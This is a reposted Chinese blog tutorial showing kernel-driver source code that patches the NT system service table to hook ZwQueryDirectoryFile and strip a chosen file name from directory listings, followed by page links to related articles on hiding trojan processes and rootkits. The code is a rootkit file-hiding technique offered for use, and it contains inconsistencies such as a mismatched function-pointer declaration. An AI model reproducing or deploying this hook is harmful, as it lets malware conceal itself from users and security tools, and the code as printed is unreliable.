编写驱动拦截NT的API实现隐藏文件目录 (转)

最新推荐文章于 2019-07-30 14:50:51 发布
最新推荐文章于 2019-07-30 14:50:51 发布
阅读量105 收藏
点赞数
文章标签: 操作系统
编写驱动拦截NT的API实现隐藏文件目录 (转)[@more@]

  目前NT下有很多种隐藏文件和目录的方法,其中最简单的一种是给文件和文件夹加上系统属性和隐藏属性,操作系统就会不在显示了,而且查找也找不到了,但是这种方法一点都不彻底,没有可用性!下面我们来介绍用NT驱动程序来拦截NTapi来实现彻底隐藏文件和目录的目的。NT下有一个文件NTDLL.DLL,大部分NTAPI都是在这个库中封装的。其中实现查找文件和目录的API接口是ZwQueryDirectoryFile,所以我们只要拦截这个API的话,文件和目录就可以完全隐藏了!下面来一步不实现(准备工作:到NTDDK中找一个WDM驱动程序模型,也就是最简单的驱动程序了):

  1.定义FILE_INFORMATION_CLASS的第3号结构:_FILE_BOTH_DIR_INFORMATION,这个结构是ZwQueryDirectoryFile必须参数。

typedef struct _FILE_BOTH_DIR_INFORMATION {
  ULONG  NextEntryOffset;
  ULONG  FileIndex;
  LARGE_INTEGER  CreationTime;
  LARGE_INTEGER  LastAccessTime;
  LARGE_INTEGER  LastWriteTime;
  LARGE_INTEGER  ChangeTime;
  LARGE_INTEGER  EndOfFile;
  LARGE_INTEGER  AllocationSize;
  ULONG  FileAttributes;
  ULONG  FileNameLength;
  ULONG  EaSize;
  CCHAR  ShortNameLength;
  WCHAR  ShortName[12];
  WCHAR  FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;

 

2.先申明ZwQueryDirectoryFile,然后定义ZwQueryDirectoryFile的原型:

extern NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile(
 IN HANDLE hFile,
 IN HANDLE hEvent OPTIONAL,
 IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
 IN PVOID IoApcContext OPTIONAL,
 OUT PIO_STATUS_BLOCK pIoStatusblock,
 OUT PVOID FileInformationBuffer,
 IN ULONG FileInformationBufferLength,
 IN FILE_INFORMATION_CLASS FileInfoClass,
 IN BOOLEAN bReturnOnlyOneEntry,
 IN PUNICODE_STRING PathMask OPTIONAL,
 IN BOOLEAN bRestartQuery);

//定义ZwQueryDirectoryFile的原型

typedef NTSTATUS (*REALZWQUERYDIRECTORYFILE)(IN HANDLE hFile,
  IN HANDLE hEvent OPTIONAL,
  IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
  IN PVOID IoApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK pIoStatusBlock,
  OUT PVOID FileInformationBuffer,
  IN ULONG FileInformationBufferLength,
  IN FILE_INFORMATION_CLASS FileInfoClass,
  IN BOOLEAN bReturnOnlyOneEntry,
  IN PUNICODE_STRING PathMask OPTIONAL,
  IN BOOLEAN bRestartQuery);

//定义一个原函数指针
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;

3.定义替换API函数的原型:

NTSTATUS HookZwQueryDirectoryFile(
  IN HANDLE hFile,
  IN HANDLE hEvent OPTIONAL,
  IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
  IN PVOID IoApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK pIoStatusBlock,
  OUT PVOID FileInformationBuffer,
  IN ULONG FileInformationBufferLength,
  IN FILE_INFORMATION_CLASS FileInfoClass,
  IN BOOLEAN bReturnOnlyOneEntry,
  IN PUNICODE_STRING PathMask OPTIONAL,
  IN BOOLEAN bRestartQuery);

4.在driverEntry(驱动入口)函数中加入如下申明:

//保存真正的ZwQueryDirectoryFile函数地址

RealZwQueryDirectoryFile=(REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));

//把自定义的替换函数指针指向真正的ZwQueryDirectoryFile函数

(REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile))=HookZwQueryDirectoryFile;

5.在DriverUnload(驱动卸载函数)函数中加入恢复代码:

//恢复原来的函数指针

(REALZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile))=RealZwQueryDirectoryFile;

6.现在准备工作做好了,函数指针都已经设置转向了,剩下的是实现这个我们自定义的替换函数HookZwQueryDirectoryFile,代码如下:

NTSTATUS HookZwQueryDirectoryFile(
  IN HANDLE hFile,
  IN HANDLE hEvent OPTIONAL,
  IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
  IN PVOID IoApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK pIoStatusBlock,
  OUT PVOID FileInformationBuffer,
  IN ULONG FileInformationBufferLength,
  IN FILE_INFORMATION_CLASS FileInfoClass,
  IN BOOLEAN bReturnOnlyOneEntry,
  IN PUNICODE_STRING PathMask OPTIONAL,
  IN BOOLEAN bRestartQuery)
{
 NTSTATUS rc;
 ULONG CR0VALUE;
 
 ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
 UNICODE_STRING uniFileName;
 
 //初始化要过虑的文件名这里是debug.exe
 RtlInitAnsiString(&HideDirFile,"dbGVIEW.EXE"); 
 
 // 执行真正的ZwQueryDirectoryFile函数
 rc = ((REALZWQUERYDIRECTORYFILE)(RealZwQueryDirectoryFile))(
 hFile,
 hEvent,
 IoApcRoutine,
 IoApcContext,
 pIoStatusBlock,
 FileInformationBuffer,
 FileInformationBufferLength,
 FileInfoClass,
 bReturnOnlyOneEntry,
 PathMask,
 bRestartQuery);
  /*如果执行成功(而且FILE_INFORMATION_CLASS的值为FileBothDirectoryInformation,我们就进行处理,过滤*/
  if(NT_SUCCESS(rc)&& (FileInfoClass == FileBothDirectoryInformation))
 {
 PFILE_BOTH_DIR_INFORMATION pFileInfo;
 PFILE_BOTH_DIR_INFORMATION pLastFileInfo;
 BOOL bLastOne;
 //把执行结果赋给pFileInfo 
 pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformationBuffer; 
 pLastFileInfo = NULL;
 //循环检查
 do
 {
 bLastOne = !( pFileInfo->NextEntryOffset );
 RtlInitUnicodeString(&uniFileName,pFileInfo->FileName);
 RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
 RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
 RtlUpperString(&ansiFileName,&ansiDirName);
 //打印结果,用debugview可以查看打印结果
 DbgPrint("ansiFileName :%s ",ansiFileName.Buffer);
 DbgPrint("HideDirFile :%s ",HideDirFile.Buffer);
 
 // 开始进行比较,如果找到了就隐藏这个文件或者目录
 if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length)
 {
 DbgPrint("This is HideDirFile! ");
 if(bLastOne)
 {
 if(pFileInfo == (PFILE_BOTH_DIR_INFORMATION)FileInformationBuffer )
 {
 rc = 0x80000006; //隐藏文件或者目录;
 }
 else
 {
 pLastFileInfo->NextEntryOffset = 0;
 }
 break;
 }
 else //指针往后移动
 {
 int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformationBuffer;
 int iLeft = (Dword)FileInformationBufferLength - iPos - pFileInfo->NextEntryOffset;
 RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
 continue;
 }
 }
 pLastFileInfo = pFileInfo;
 pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);
 
 }while(!bLastOne);
 RtlFreeAnsiString(&ansiDirName);
 RtlFreeAnsiString(&ansiFileName);
 }
 return(rc);
}

本代码在开发机器(winxp+SP1+XPDDK)上测试通过!


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10748419/viewspace-963553/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10748419/viewspace-963553/

cuiji1279
关注
HOOK API 实现文件隐藏 源代码
05-08
本人结合HOOK API和远程线程技术实现的一个简单的文件隐藏程序,在应用层实现文件隐藏
WIN2K-NT-XP-监视文件系统过滤驱动程序的驱动程序原代码
10-30
文件系统过滤驱动是Windows内核模式驱动程序的一种,它运行在操作系统的核心层,能够拦截并处理文件系统的IRP(I/O请求包),从而实现对文件操作的全面监控。此类驱动常用于安全软件、数据备份和文件加密等领域,以...
编写驱动拦截NTAPI实现隐藏文件目录
TaShin的专栏
09-23 1530
      目前NT下有很多种隐藏文件和目录的方法,其中最简单的一种是给文件和文件夹加上系统属性和隐藏属性,操作系统就会不在显示了,而且查找也找不到了,但是这种方法一点都不彻底,没有可用性!下面我们来介绍用NT驱动程序来拦截NTAPI实现彻底隐藏文件和目录的目的。NT下有一个文件NTDLL.DLL,大部分NTAPI都是在这个库中封装的。其中实现查找文件和目录的API接口是ZwQueryDirec
NT系统下木马进程的隐藏与检测()
weixin_34122810的博客
10-02 166
在WIN9X中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WINNT中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能欺骗WINNT的任务管理器,以至于很多的朋友问我:在WINNT下难道木马真的再也无法隐藏自己的进程了?本文试图通过探讨WINNT中木马的几种常用隐藏进程手段,给大家揭示木马/后门程序在WINNT中进程隐藏的方法和查找的途径。  我们知道,...
【】编写驱动拦截NTAPI实现隐藏文件目录
floweronwarmbed的专栏
11-03 572
 目前NT下有很多种隐藏文件和目录的方法,其中最简单的一种是给文件和文件夹加上系统属性和隐藏属性,操作系统就会不在显示了,而且查找也找不到了,但是这种方法一点都不彻底,没有可用性!下面我们来介绍用NT驱动程序来拦截NTAPI实现彻底隐藏文件和目录的目的。NT下有一个文件NTDLL.DLL,大部分NTAPI都是在这个库中封装的。其中实现查找文件和目录的API接口是ZwQueryDirectoryF
编写WDM驱动程序,拦截API实现隐藏文件目录的功能
08-02
WDM编写驱动拦截NTAPI实现隐藏文件目录.txt
HideProcess完结篇.zip_c++ 进程隐藏_c++隐藏进程_隐藏进程_隐藏驱动_驱动隐藏进程
07-15
4. **驱动隐藏**:更深层次的隐藏方法是编写驱动程序,驱动可以直接与操作系统内核交互。通过驱动,可以在系统层面上隐藏进程,使其不被常规的进程枚举函数如`EnumProcesses`和`OpenProcess`发现。 在压缩包内的...
Win2000下系统进程隐藏代码 .rar_进程隐藏
09-22
4. **内核驱动**:更高级的方法可能涉及到编写内核驱动程序,直接在操作系统内核层面上操作。这样可以更直接地影响进程的管理和显示,但风险也更大,因为任何错误都可能导致系统不稳定甚至崩溃。 压缩包中的...
文件系统驱动开发的文档资料(IFS+DDK)
01-12
例如,可以使用 ZwQueryDirectoryFile 或 NtQueryDirectoryFile API 来枚举文件系统中的目录和文件。这些函数允许驱动程序查询指定目录下的所有文件,从而获取系统路径。此外,也可以通过解析卷和文件对象来获取路径...
ntapi.h ntdll.lib WSPiApi.h
08-26
ntapi.h ntdll.lib WSPiApi.h 下载
NT系统下木马进程的隐藏与检测
weixin_33768481的博客
01-07 358
    在WIN9X中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切 在WINNT中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能 欺骗WINNT的任务管理器,以至于很多的朋友问我:在WINNT下难道木马真的再也无法隐 藏自己的进程了?本文试图通过探讨WINNT中木马的几种常用隐藏进程手段,给大家揭示 木马/后门程序在WINNT中进程隐藏的方...
编写驱动拦截NTAPI实现隐藏文件目录(代码)
forever1dreamsxx--NLP
08-08 1424
载地址:http://www.cnblogs.com/qiuyi21/articles/1151923.html     网上流传的一篇文章《编写驱动拦截NTAPI实现隐藏文件目录》,当时我在网上搜索内核级Hook资料时搜索到的,因为自己对驱动程序还是初初接触,所有想按照这篇文章自己弄个简单的驱动出来,测试测试~~~但由于网上流传的这篇文章都丢失了原作者和原出处,有些代码似乎是错的,但自
隐藏文件夹的功能(系统api拦截)
weixin_33777877的博客
03-14 148
我看到网上有的程序由隐藏文件夹的功能,设置之后,选则工具——文件夹选项——显示所有文件和文件夹都不能显示,这是如何做到的呀?  ---------------------------------------------------------------   编写驱动拦截NTAPI实现隐藏文件目录  目前NT下有很多种隐藏文件和目录的方法,其中最简单的一种是给文件和文件夹加上系统属性和隐藏属性,...
关于隐藏进程ROOKIT木马的介绍
Shannonhe的专栏
11-11 1036
这样的事情并不一定会发生在所有个人计算机用户的身上,因为它们并非主流的群体,然而一旦不幸发生,却会给你带来远比以前遭受的一切病毒袭击更恐惧的感受,你会惊恐的发现系统有点异常行为、敏感数据遭遇盗窃、甚至有明显的木马感染的表现,但是杀毒软件报告你的系统完好,你用流行的进程查看工具也没有发现可疑程序,但是你的机器却一直表现异常……    正如自然界的规则一样,最流行的病毒,对生物的伤害却是最小的,
最简单的NT驱动
weixin_30674525的博客
07-30 386
一、源码 //HelloDDK.h #pragma once #ifdef __cplusplusextern "C"{#endif#include <ntddk.h>#ifdef __cplusplus}#endif #define PAGEDCODEcode_seg("PAGE")#define LOCKEDCODEcode_seg()#define INITCOD...
驱动拦截NTAPI实现隐藏木马客户端
chengyixian7877的博客
03-09 57
目前NT下有很多种隐藏文件和目录的方法,其中最简单的一种是给文件和文件夹加上系统属性和隐藏属性,操作系统就会不在显示了,而且查找也找不到了,但是这种方法一点都不彻底,没有可用性!下面我们来介绍用NT驱动程序来拦截NTAPI实现彻底隐藏文件和目录的目的。NT下有一个文件NTDLL.DLL,大...
使用WDM驱动拦截NTAPI隐藏文件目录技术解析
"这篇文章主要介绍了如何使用WDM驱动程序来拦截NT API实现隐藏文件目录的功能。通过理解并利用NT内核API,特别是ZwQueryDirectoryFile函数,我们可以创建一个驱动来控制文件系统的目录访问。" 在Windows驱动开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值